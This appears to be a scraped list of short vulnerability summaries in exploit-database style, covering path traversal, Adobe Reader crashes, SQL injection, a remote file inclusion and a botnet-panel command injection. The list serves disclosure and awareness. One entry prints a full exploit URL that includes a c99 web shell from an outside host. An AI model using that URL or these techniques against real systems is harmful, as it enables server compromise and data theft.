This vulnerability is caused when processing custom userfield.
This vulnerability allows an attacker to disclose sensitive files on the server using a relative path traversal technique. By manipulating the 'id' parameter in the 'get_image.php' and 'get_file.php' scripts, an attacker can traverse directories and access files outside the intended directory.
The crash occurs in the latest version of Adobe Acrobat Reader DC for Windows when opening a malformed PDF file. The crash is caused by a heap block being freed again, resulting in a verifier stop message. This verifier stop is not continuable and the process will be terminated.
A vulnerability that causes an access violation exception in Adobe Acrobat Reader DC for Windows when opening a malformed PDF file.
Access violation exception occurs when opening a malformed PDF file in Adobe Acrobat Reader DC for Windows. The exception is caused by a memory corruption issue.
The CMS Galaxie Software is vulnerable to remote SQL injection. The login page may not work, but it is possible to inject your own username and password using SQL injection. It is also possible that they are using a different table name for the login page.
The fontsub.dll library in Windows is responsible for subsetting TTF fonts. A malformed font file can trigger a crash in the fontsub!WriteTableFromStructure function, leading to a memory corruption vulnerability.
The AFDKO (Adobe Font Development Kit for OpenType) toolset, specifically the font parsing code, is vulnerable to attacks due to outdated versions of the code found in Adobe's desktop software such as Acrobat. The vulnerability arises from potential attack surfaces created by the presence of AFDKO copies in multiple libraries, including acrodistdll.dll, Acrobat.dll, CoolType.dll, and AdobePDFL.dll. These outdated versions of AFDKO pose a risk in terms of potential vulnerabilities and exploitation possibilities.
The vulnerability exists in the 'head.php' file where the 'include' function is used without proper validation. An attacker can exploit this by providing a remote file URL in the 'path' parameter, which will be included and executed by the application. In this case, the exploit URL is 'Www.RxH.com/citywriter/head.php?path=http://www.no-hack.fr/shells/c99.txt?'
This module exploits the command injection vulnerability of tesla agent botnet panel.
Services By CQR